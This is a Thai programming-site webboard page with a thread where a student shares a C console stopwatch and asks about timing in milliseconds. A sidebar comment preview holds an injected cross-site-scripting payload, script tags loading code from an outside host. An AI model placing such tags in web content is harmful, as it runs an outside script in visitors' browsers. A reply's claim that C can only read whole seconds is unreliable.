หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 Webboard

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

กระทู้ #3444 [C]

ปัญหาโปรแกรมจับเวลา

#include<stdio.h>
#include<conio.h>
#include<windows.h>
#include<time.h>
#include <stdlib.h>
void number0();
void number1();
void number2();
void number3();
void number4();
void number5();
void number6();
void number7();
void number8();
void number9();

void fun_hh(int x,int y);
void fun_h(int x,int y);
void fun_mm(int x,int y);
void fun_ss(int x,int y);
void fun_s(int x,int y);
void fun_ms(int x,int y);
void fun_mms(int x,int y);
void delay(double mseconds);
COORD coord={0,0};
void gotoxy(int x,int y)
{
coord.X=x;
coord.Y=y;
SetConsoleCursorPosition(GetStdHandle(STD_OUTPUT_HANDLE),coord);
}
short mms=0,ms=0,ss=0,s=0,m=0,mm=0,h=0,hh=0;
main()
{
short start=1;
short exit=0;
char ch;

while(exit!=1)

{
// delay(100);
gotoxy(20,9);
printf("Start : 'S' Reset : 'R' Exit : 'Q'");
fun_hh(9,2);
fun_h(15,2);
gotoxy(21,3);
printf("#");
gotoxy(21,5);
printf("#");
fun_mm(23,2);
fun_m(29,2);
gotoxy(35,3);
printf("#");
gotoxy(35,5);
printf("#");
fun_ss(37,2);
fun_s(43,2);
gotoxy(49,3);
printf("#");
gotoxy(49,5);
printf("#");
fun_ms(51,2);
fun_mms(57,2);
if(_kbhit())
{
ch=getch();
if(ch=='q'||ch=='Q')
{
exit=1;
}
else if(ch=='r'||ch=='R')
{
hh=0,h=0;
mm=0,m=0;
ss=0,s=0;
mms=0,ms=0;
}
else if(ch=='s'||ch=='S')
{
start=0;

}
}
while(start!=1)
{

gotoxy(20,9);
printf(" Stop Enter key S ");
mms++;
delay(6);

if(_kbhit())
{
ch=getch();
if(ch=='s'||ch=='S')
{
start=1;
}
}
if(mms>9)
{
ms++;
mms=0;
{
if(ms>9)
{
ms=0;
s++;
if(s>9)
{
ss++;
s=0;
if(ss>5)
{
ss=0;
m++;
if(m>9)
{
mm++;
m=0;
if(mm>5)
{
h++;
mm=0;
if(h>9)
{
hh++;
h=0;
}
}
}
}
}
}
}
}


fun_hh(9,2);
fun_h(15,2);
gotoxy(21,3);
printf("#");
gotoxy(21,5);
printf("#");
fun_mm(23,2);
fun_m(29,2);
gotoxy(35,3);
printf("#");
gotoxy(35,5);
printf("#");
fun_ss(37,2);
fun_s(43,2);
gotoxy(49,3);
printf("#");
gotoxy(49,5);
printf("#");
fun_ms(51,2);
fun_mms(57,2);
}
}
}
void fun_hh(int x,int y)
{
switch(hh)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}
void fun_h(int x,int y)
{
switch(h)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}

void fun_mm(int x,int y)
{
switch(mm)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}
void fun_m(int x,int y)
{
switch(m)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}
void fun_ss(int x,int y)
{
switch(ss)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}
void fun_s(int x,int y)
{
switch(s)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}
void fun_ms(int x,int y)
{
switch(ms)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}

void fun_mms(int x,int y)
{
switch(mms)
{
case 0 :number0(x,y);break;
case 1 :number1(x,y);break;
case 2 :number2(x,y);break;
case 3 :number3(x,y);break;
case 4 :number4(x,y);break;
case 5 :number5(x,y);break;
case 6 :number6(x,y);break;
case 7 :number7(x,y);break;
case 8 :number8(x,y);break;
case 9 :number9(x,y);break;
}
}

void number0(int x,int y)
{
gotoxy(x,y);
printf("#####\n");
gotoxy(x,y+1);
printf("# #");
gotoxy(x,y+2);
printf("# #");
gotoxy(x,y+3);
printf("# #");
gotoxy(x,y+4);
printf("#####");
}
void number1(int x,int y)
{
gotoxy(x,y);
printf(" #");
gotoxy(x,y+1);
printf(" #");
gotoxy(x,y+2);
printf(" #");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf(" #");
}
void number2(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf(" #");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf("# ");
gotoxy(x,y+4);
printf("#####");
}
void number3(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf(" #");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf("#####");
}
void number4(int x,int y)
{
gotoxy(x,y);
printf("# #");
gotoxy(x,y+1);
printf("# #");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf(" #");
}
void number5(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf("# ");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf("#####");

}
void number6(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf("# ");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf("# #");
gotoxy(x,y+4);
printf("#####");
}
void number7(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf(" #");
gotoxy(x,y+2);
printf(" #");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf(" #");
}
void number8(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf("# #");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf("# #");
gotoxy(x,y+4);
printf("#####");
}
void number9(int x,int y)
{
gotoxy(x,y);
printf("#####");
gotoxy(x,y+1);
printf("# #");
gotoxy(x,y+2);
printf("#####");
gotoxy(x,y+3);
printf(" #");
gotoxy(x,y+4);
printf("#####");
}

void delay( double mseconds)
{
clock_t goal = mseconds + clock();
while (goal > clock());
}
จากคุณ : ธงไชย สิทธิเขตกรณ์ / freedomkingoo@hotmail.co.th [2013-09-19 16:32:41]  

183.89.71.84 ความคิดเห็น #28904 (จาก IP: 183.89.71.84)
ปัญหามันอยุ่ที่ผมใช้ delay ในการนับเวลาครับ คืออยากได้วิธีที่ใช้เวลาอ้างอิงจากเวลาเครื่องไม่ใช่อ้างอิงจาก delay อะครับ รบกวนช่วยแนะนำที
จากคุณ : ธงไชย สิทธิเขตกรณ์ [2013-09-19 16:34:44]

58.8.250.251 ความคิดเห็น #28905 (จาก IP: 58.8.250.251)
ในเว็บก็มีโปรแกรมสั้นๆเป็นตัวอย่างให้แล้วนะครับ
จากโค้ดจะมี delay ก็จริง แต่ก็มีการดึงเวลาเครื่องมาเปรียบเทียบ
เอาไปพัฒนาต่อได้ครับ
http://www.sourcecode.in.th/homeworks.php?id=8
จากคุณ : maddog [2013-09-19 18:47:49]

183.89.71.84 ความคิดเห็น #28906 (จาก IP: 183.89.71.84)
รบกวนถามต่ออีกนิดน่ะครับ ถ้าจะดึงเวลาจากเครื่องหน่วยเป็น ms อะครับ เราจะดึงยังไง ผมลองทำแล้วมันดึกได้แต่ sec ตามเวลาเครื่องอะครับ

ขอบคุณครับ
จากคุณ : ธงไชย สิทธิเขตกรณ์ [2013-09-20 10:07:50]

58.8.215.158 ความคิดเห็น #28907 (จาก IP: 58.8.215.158)
เท่าทีทราบ c++ ดึงได้แค่ วินาทีครับ
จากคุณ : maddog [2013-09-20 14:21:32]

203.158.192.55 ความคิดเห็น #28908 (จาก IP: 203.158.192.55)
ขอบคุณครับ
เสร็จพอดีเลย มันได้แค่ วิ อะครับ
จากคุณ : ธงไชย [2013-09-20 16:02:35]

101.108.214.85 ความคิดเห็น #28909 (จาก IP: 101.108.214.85)
ถ้าเอา advance หน่อยก็ต้องเขียนไป call Asambly เอานะครับ ต้องหา วิธีเรียก interrupt เอา รับรองดึง ได้ละเอียดกว่าวินาที

แต่แค่ทฤษฏีเพราะผมเองก็ยังไม่เคยพิสูจน์ (ใครว่างก็จัดได้)
จากคุณ : maddog [2013-09-21 01:18:54]

183.89.72.213 ความคิดเห็น #28921 (จาก IP: 183.89.72.213)
ภาษา c เรียก interrupt ได้ด้วยหรอครับ สุดยอดไปเลยยย อันนี้เป็นงานที่ผมทำส่งนะครับ เป็นมินิโปรเจค เผื่อใครเอาไปศึกษาดูนะครับ <br>#include<stdio.h><br>#include<conio.h><br>#include<windows.h><br>#include<time.h><br>#include <stdlib.h><br>void number0();<br>void number1();<br>void number2();<br>void number3();<br>void number4();<br>void number5();<br>void number6();<br>void number7();<br>void number8();<br>void number9();<br>void fun_hh(int x,int y);<br>void fun_h(int x,int y);<br>void fun_mm(int x,int y);<br>void fun_ss(int x,int y);<br>void fun_s(int x,int y);<br>void delay(double mseconds);<br>COORD coord={0,0};<br>void gotoxy(int x,int y)<br> {<br> coord.X=x;<br> coord.Y=y;<br> SetConsoleCursorPosition(GetStdHandle(STD_OUTPUT_HANDLE),coord);<br> }<br> short ss=0,s=0,m=0,mm=0,h=0,hh=0;<br><br> main()<br> {<br> short start=1;<br> short exit=0;<br> char ch;<br> time_t timer;<br> struct tm * ptm;<br> int sec=0;<br>int i,put=0;<br>gotoxy(7,9);<br><br>while(exit!=1)<br>{<br><br> Sleep(100);<br> gotoxy(7,9);<br> printf(\
จากคุณ : ธงไชย สิทธิเขตกรณ์ [2013-09-23 14:20:16]

183.89.72.213 ความคิดเห็น #28922 (จาก IP: 183.89.72.213)
ภาษา c เรียก interrupt ได้ด้วยหรอครับ สุดยอดไปเลยยย อันนี้เป็นงานที่ผมทำส่งนะครับ เป็นมินิโปรเจค พึ่งเริ่มเรียนภาษา c เองครับ ยัง advance ไม่เป็นเลยครับ
จากคุณ : ธงไชย สิทธิเขตกรณ์ [2013-09-23 14:23:32]

115.87.255.96 ความคิดเห็น #28923 (จาก IP: 115.87.255.96)
มันก็แค่เทคนิค ลองดูใน help c++ ก็ได้ครับ
มันจะมี lib ของ dos.h ที่จะมีคำสั่งเรียก interrupt อยู่
ผมเองก็ยังไม่เคยลองใช้เหมือนกัน แต่รู้ว่า c++ มันมีมาให้แล้ว
จากคุณ : maddog [2013-09-24 10:23:47]
ตอบกระทู้
  • ห้ามการโฆษณา หากต้องการติดต่อหาลูกค้า ติดต่อโฆษณาโดยตรงได้ที่ webmaster@sourcecode.in.th
  • ห้ามใช้คำหยาบและคำพูดที่ไม่เหมาะสม
  • ขอสงวนสิทธิหากตรวจพบ ข้อความที่ไม่เหมาะสม ข้อความนั้นจะถูกลบทันที
ชื่อ
อีเมล์
รายละเอียด

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 
 
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th